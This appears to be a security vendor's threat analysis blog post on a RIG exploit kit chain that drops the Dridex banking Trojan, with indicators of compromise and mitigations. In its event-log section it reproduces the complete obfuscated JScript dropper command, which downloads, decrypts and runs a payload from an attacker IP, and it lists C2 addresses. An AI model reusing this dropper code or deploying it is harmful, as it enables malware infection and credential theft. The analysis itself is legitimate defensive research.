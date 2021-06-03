The RIG Exploit Kit (EK), which was discovered in 2014, is known to exploit vulnerabilities in Microsoft’s Internet Explorer browser and third-party applications such as Java, Adobe Flash, and Microsoft Silverlight. Browser exploits are very rare nowadays, however, in March 2021 researchers discovered the Rig EK had the ability to exploit CVE-2021-26411 affecting Microsoft Internet Explorer.

Dridex is known as a banking Trojan which has the ability to steal banking credentials and other personal information to gain access to financial records. Recently, a researcher @nao_sec, discovered Dridex had switched its host-based infection techniques to bypass security and anti-virus vendor protections.

OpenText consistently researches how exploit kits and other malware affect and interact with the endpoint for the best detection techniques. Below is an example of the tactic, techniques, and procedures (TTP’s) OpenText observed during a recent RIG exploit and Dridex Trojan infection.

Initial infection chain – redirect to the RIG EK:

Shown above: Malicious domain using HTTP 302 to redirect to the RIG EK landing page



Shown above: IP address and URI string hosting the RIG EK along with partial exploit code

Shown above: Iexplore.exe interacting with cmd.exe to run the post exploit script

Shown above: Cmd.exe executing the dropped Dridex payload in the Local Temp directory to start the Dridex Trojan after the exploit

Shown above: Initial Dridex payload displaying the binary meta data

Shown above: Persistence is achieved via the creation of a Scheduled Task set to run at start-up and every 30 minutes.

Shown above: Dridex uses DLL (Dynamic Link Library) hijacking and process hollowing which moves malicious DLL and legitimate Windows binaries into the Local Temp or Roaming directories.

Shown above: Dridex Trojan IP and SSL Certificate seen during the process hollowing of Windows process spoolsv.exe

Tactic, Techniques, and Procedures (TTP’s) observed during infection:

Windows event logs showing associated processes and commandline

ParentProcessName C:\Program Files (x86)\Internet Explorer\iexplore.exe

CommandLine cmd.exe /q /c cd /d “%tmp%” && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/[“Wait”+”ForResponse”]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript.Echo(),o=”Object”,A=Math,a=Function(“b”,”return WScript.Create”+o+”(b)”);P=(“”+WScript).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=WScript.Arguments,e=”WinHTTP”,Z=”cmd”,Q=a(“WinH”+”ttp.WinHttpRequest.5.1”),j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=WScript[P+”FullName”],E=”.”+p;Y=”Type”;s[Y]=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(32-1^<d){var z=1;x+=”dll”}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x=”regsvr”+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp “hj4ZytE5dZgd” “http://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ==” “2”” NewProcessName C:\Windows\SysWOW64\cmd.exe

ParentProcessName C:\Windows\SysWOW64\cmd.exe

CommandLine wsCripT //B //E:JScript 3.tMp “hj4ZytE5dZgd” “http://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ==” “2”” NewProcessName C:\Windows\SysWOW64\wscript.exe

ParentProcessName C:\Windows\SysWOW64\wscript.exe

CommandLine “C:\Windows\System32\cmd.exe” /c y0xyn.exe

NewProcessName C:\Windows\SysWOW64\cmd.exe

ParentProcessName C:\Windows\SysWOW64\cmd.exe

CommandLine y0xyn.exe

NewProcessName C:\Users\ROBERT~1.TOM\AppData\Local\Temp\y0xyn.exe

ParentProcessName C:\Users\ROBERT~1.TOM\AppData\Local\Temp\y0xyn.exe

CommandLine C:\Windows\system32\schtasks.exe /run /tn “Xjewnuamckmuzcr”

NewProcessName C:\Windows\System32\schtasks.exe

Windows binaries observed being moved during DLL hijacking process:

Parent Process: Explorer.exe

Path: C:\Users\[REDACTED]\AppData\Local\Tde\cmstp.exe

Path: C:\Users\[REDACTED]\AppData\Local\yth\Utilman.exe

Path: C:\Users\[REDACTED]\AppData\Local\9sXuqoY\cttune.exe

Path: C:\Users\[REDACTED]\AppData\Local\0sLDUDyo\wermgr.exe

Path: C:\Users\[REDACTED]\AppData\Local\xIjxwZ\msinfo32.exe

Path: C:\Users\[REDACTED]\AppData\Local\HBzY3Lo4\ddodiag.exe

Path: C:\Users\[REDACTED]\AppData\Roaming\Jhbyypvl\dvdupgrd.exe

Path: C:\Users\[REDACTED]\AppData\Local\LCffUor\StikyNot.exe

Path: C:\Users\[REDACTED]\AppData\Local\AqPAr1p0\bcastdvr.exe

Path: C:\Users\[REDACTED]\AppData\Local\hyWpwjovS\SysResetErr.exe

Path: C:\Users\[REDACTED]\AppData\Local\2eYtH4\LockScreenContentServer.exe

Path: C:\Users\[REDACTED]\AppData\Local\9I16g\AtBroker.exe

Path: C:\Users\[REDACTED]\AppData\Local\dlIR8aEB3\phoneactivate.exe

Path: C:\Users\[REDACTED]\AppData\Local\gHias\Dxpserver.exe

Path: C:\Users\[REDACTED]\AppData\Local\hpb1TE9\wextract.exe

Path: C:\Users\[REDACTED]\AppData\Local\w4eFILY3X\msdt.exe

Path: C:\Users\[REDACTED]\AppData\Local\qYd59E7v\CameraSettingsUIHost.exe

Path: C:\Users\[REDACTED]\AppData\Local\WWTL\isoburn.exe

Path: C:\Users\[REDACTED]\AppData\Local\AgNcSv4BT\bcastdvr.exe

Path: C:\Users\[REDACTED]\AppData\Local\WwQHiF3\RdpSaUacHelper.exe

Path: C:\Users\[REDACTED]\AppData\Local\pTBOO\rdpclip.exe

Process hollowing observed used to communicate with the Command and Control (C2):



Parent Process: Explorer.exe

Process Path: C:\Windows\system32\spoolsv.exe

Process CommandLine: C:\Windows\system32\spoolsv.exe

Parent Process: Explorer.exe

Process Path: C:\Windows\System32\svchost.exe

Process CommandLine: C:\Windows\System32\svchost.exe (NOTE: NO -k in the CommandLine)

Indicators of compromise:

Rig EK:

ankltrafficexit.xyz/trafficexit – Redirect Domain to Rig EK landing page

45.138.26.82 – IP Hosting Rig EK



IP Addresses and Ports Associated with the Dridex Trojan C2:

156.253.5.151 Port 443

136.243.194.22 Port 443

84.232.252.62 Port 443

77.201.73.52 Port 8443

51.195.18.83 Port 448

89.215.165.36 Port 8443

45.145.55.170 Port 443

164.155.66.30 Port 4143

205.185.113.183 Port 443

88.132.150.82 Port 443

Dridex Trojan binary and associated hash:

y0xyn.exe – Initial Dridex binary dropped by Rig EK

SHA-256 hash: e63628e1ea625d9363bd76e38a225fb78b4b70114ab97ee43b02b0fd68fc7176

Link to Dridex Trojan binary for validation purposes.

If organizations are concerned they have been effected by the Rig EK, OpenText would recommend the following actions are taken:

Ensure browsers and plugins are up to date and patched

Enable Protected Mode within Microsoft Internet Explorer browser

The OpenText Security Services team uses their extensive experience to identify an organization’s security risks and work with them to keep systems protected, offering multiple services to address cyber security and privacy objectives. Contact us for more information.

Author: Lenny Conway, Lead Consultant